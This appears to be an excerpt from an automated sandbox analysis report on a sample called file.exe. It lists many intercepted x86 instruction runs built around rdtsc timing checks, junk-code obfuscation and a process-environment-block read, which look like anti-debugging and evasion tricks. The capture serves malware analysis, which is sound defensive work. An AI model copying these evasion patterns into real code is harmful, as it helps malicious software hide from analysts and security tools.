Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600EB second address: 726012A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F70F070E5CBh 0x00000013 jmp 00007F70F070E5D3h 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726012A second address: 7260130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260130 second address: 7260134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260134 second address: 7260155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260155 second address: 7260238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F70F070E5D4h 0x00000011 jmp 00007F70F070E5D5h 0x00000016 popfd 0x00000017 popad 0x00000018 mov esi, dword ptr [759B06ECh] 0x0000001e jmp 00007F70F070E5CDh 0x00000023 test esi, esi 0x00000025 jmp 00007F70F070E5CEh 0x0000002a jne 00007F70F070F423h 0x00000030 pushad 0x00000031 jmp 00007F70F070E5CEh 0x00000036 mov edx, ecx 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov ecx, 408172F9h 0x00000040 call 00007F70F070E5D6h 0x00000045 jmp 00007F70F070E5D2h 0x0000004a pop eax 0x0000004b popad 0x0000004c push eax 0x0000004d pushad 0x0000004e mov edi, eax 0x00000050 pushfd 0x00000051 jmp 00007F70F070E5CAh 0x00000056 and eax, 199ACE68h 0x0000005c jmp 00007F70F070E5CBh 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F70F070E5D5h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260238 second address: 726023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726023E second address: 7260242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260242 second address: 7260278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F70F0BCDB15h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260278 second address: 726027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726027F second address: 72602B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000044h 0x00000009 jmp 00007F70F0BCDB19h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F70F0BCDB0Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72602B1 second address: 7260325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 11FF5532h 0x00000008 pushfd 0x00000009 jmp 00007F70F070E5D3h 0x0000000e sub ax, 972Eh 0x00000013 jmp 00007F70F070E5D9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 448Eh 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CFh 0x0000002a sbb ah, 0000003Eh 0x0000002d jmp 00007F70F070E5D9h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260325 second address: 726032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726032B second address: 726032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726032F second address: 7260333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260333 second address: 7260370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F70F070E5CBh 0x00000010 adc si, 2F4Eh 0x00000015 jmp 00007F70F070E5D9h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260370 second address: 7260376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260376 second address: 726039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov edx, 1B2C73E0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F70F070E5D2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726039A second address: 72603AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603AC second address: 72603B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603B0 second address: 72603F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB18h 0x00000017 jmp 00007F70F0BCDB15h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603F4 second address: 7260409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov cx, EDFBh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [eax+18h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260409 second address: 726040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726040D second address: 7260411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260411 second address: 7260417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726044C second address: 7260487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70F070E5D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260487 second address: 7260496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260496 second address: 72604BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F070E5D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604BC second address: 72604C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604C1 second address: 72604C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604C7 second address: 7260538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F715F29CCE0h 0x0000000d pushad 0x0000000e mov ax, di 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB0Bh 0x00000017 adc ah, FFFFFFBEh 0x0000001a jmp 00007F70F0BCDB19h 0x0000001f popfd 0x00000020 popad 0x00000021 sub eax, eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F70F0BCDB13h 0x0000002c add ah, FFFFFFCEh 0x0000002f jmp 00007F70F0BCDB19h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260538 second address: 7260589 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F070E5D0h 0x00000008 sbb esi, 48A67048h 0x0000000e jmp 00007F70F070E5CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F70F070E5D6h 0x0000001e add ax, B2A8h 0x00000023 jmp 00007F70F070E5CBh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260589 second address: 72605DC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F0BCDB18h 0x00000008 adc eax, 55E9A508h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi], edi 0x00000019 jmp 00007F70F0BCDB16h 0x0000001e mov dword ptr [esi+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bl, 9Bh 0x00000026 push eax 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72605DC second address: 72605EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72605EE second address: 7260687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f call 00007F70F0BCDB14h 0x00000014 mov ah, DDh 0x00000016 pop edi 0x00000017 mov cl, 67h 0x00000019 popad 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F70F0BCDB0Fh 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 mov cl, 7Ah 0x00000028 pushfd 0x00000029 jmp 00007F70F0BCDB11h 0x0000002e xor ecx, 63D022F6h 0x00000034 jmp 00007F70F0BCDB11h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+10h], eax 0x0000003e jmp 00007F70F0BCDB0Eh 0x00000043 mov eax, dword ptr [ebx+50h] 0x00000046 pushad 0x00000047 mov cx, F0ADh 0x0000004b push ecx 0x0000004c mov ax, bx 0x0000004f pop edi 0x00000050 popad 0x00000051 mov dword ptr [esi+14h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260687 second address: 726069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726069F second address: 72606F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F70F0BCDB0Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F70F0BCDB0Ch 0x0000001d xor si, 7338h 0x00000022 jmp 00007F70F0BCDB0Bh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72606F1 second address: 726075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, cx 0x0000000c popad 0x0000000d mov eax, dword ptr [ebx+58h] 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 mov cl, 7Bh 0x00000015 popad 0x00000016 mov dword ptr [esi+1Ch], eax 0x00000019 pushad 0x0000001a call 00007F70F070E5D7h 0x0000001f mov bx, si 0x00000022 pop eax 0x00000023 push ebx 0x00000024 call 00007F70F070E5D0h 0x00000029 pop eax 0x0000002a pop edx 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+5Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726075F second address: 7260764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260764 second address: 7260777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+20h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260777 second address: 726077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726077B second address: 726077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726077F second address: 7260785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260785 second address: 726079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726079F second address: 72607CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 mov ecx, 0E49C8C7h 0x00000017 popad 0x00000018 mov dword ptr [esi+24h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edx, si 0x00000021 mov bx, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72607CA second address: 7260866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx esi, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+64h] 0x0000000f pushad 0x00000010 mov cl, dh 0x00000012 jmp 00007F70F070E5D6h 0x00000017 popad 0x00000018 mov dword ptr [esi+28h], eax 0x0000001b jmp 00007F70F070E5D0h 0x00000020 mov eax, dword ptr [ebx+68h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CEh 0x0000002a or ch, 00000068h 0x0000002d jmp 00007F70F070E5CBh 0x00000032 popfd 0x00000033 jmp 00007F70F070E5D8h 0x00000038 popad 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c jmp 00007F70F070E5D0h 0x00000041 mov ax, word ptr [ebx+6Ch] 0x00000045 pushad 0x00000046 mov ah, bh 0x00000048 popad 0x00000049 mov word ptr [esi+30h], ax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260866 second address: 726086C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726086C second address: 7260872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260872 second address: 7260876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260876 second address: 726087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726087A second address: 726089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f pushad 0x00000010 mov di, ax 0x00000013 mov dl, cl 0x00000015 popad 0x00000016 mov word ptr [esi+32h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726089B second address: 72608AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260973 second address: 72609E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB17h 0x00000009 sub cx, 79BEh 0x0000000e jmp 00007F70F0BCDB19h 0x00000013 popfd 0x00000014 mov ah, 9Bh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F70F0BCDB14h 0x00000024 sbb cx, 29E8h 0x00000029 jmp 00007F70F0BCDB0Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609E0 second address: 72609E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609E6 second address: 72609EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609EA second address: 72609EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609EE second address: 7260A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F70F0BCDB0Ah 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70F0BCDB17h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260A1D second address: 7260ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F70F070E5CEh 0x00000011 nop 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F70F070E5D4h 0x0000001d sub ax, 9368h 0x00000022 jmp 00007F70F070E5CBh 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F70F070E5D5h 0x00000033 xor ch, FFFFFF86h 0x00000036 jmp 00007F70F070E5D1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F70F070E5D0h 0x00000042 and al, 00000028h 0x00000045 jmp 00007F70F070E5CBh 0x0000004a popfd 0x0000004b popad 0x0000004c popad 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F70F070E5D0h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260B37 second address: 7260B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260B3C second address: 7260B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260B42 second address: 7260BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F715F29C67Fh 0x0000000e pushad 0x0000000f jmp 00007F70F0BCDB13h 0x00000014 mov di, ax 0x00000017 popad 0x00000018 mov eax, dword ptr [ebp-0Ch] 0x0000001b jmp 00007F70F0BCDB12h 0x00000020 mov dword ptr [esi+04h], eax 0x00000023 jmp 00007F70F0BCDB10h 0x00000028 lea eax, dword ptr [ebx+78h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F70F0BCDB0Eh 0x00000032 and ah, 00000068h 0x00000035 jmp 00007F70F0BCDB0Bh 0x0000003a popfd 0x0000003b push eax 0x0000003c push ebx 0x0000003d pop ecx 0x0000003e pop ebx 0x0000003f popad 0x00000040 push 00000001h 0x00000042 pushad 0x00000043 mov ax, CAF3h 0x00000047 mov cx, 234Fh 0x0000004b popad 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260BCA second address: 7260BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260BCE second address: 7260BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260BE5 second address: 7260C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d mov di, 246Eh 0x00000011 popad 0x00000012 nop 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F70F070E5CBh 0x0000001a xor ax, 851Eh 0x0000001f jmp 00007F70F070E5D9h 0x00000024 popfd 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F70F070E5D8h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260C56 second address: 7260CF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70F0BCDB17h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 pushfd 0x00000013 jmp 00007F70F0BCDB11h 0x00000018 and ecx, 7B09BE16h 0x0000001e jmp 00007F70F0BCDB11h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F70F0BCDB11h 0x0000002b nop 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F70F0BCDB0Ch 0x00000033 and esi, 5F233968h 0x00000039 jmp 00007F70F0BCDB0Bh 0x0000003e popfd 0x0000003f push eax 0x00000040 push edx 0x00000041 call 00007F70F0BCDB16h 0x00000046 pop eax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D18 second address: 7260D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D2A second address: 7260D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D2E second address: 7260D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D3E second address: 7260D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D42 second address: 7260D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D46 second address: 7260D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
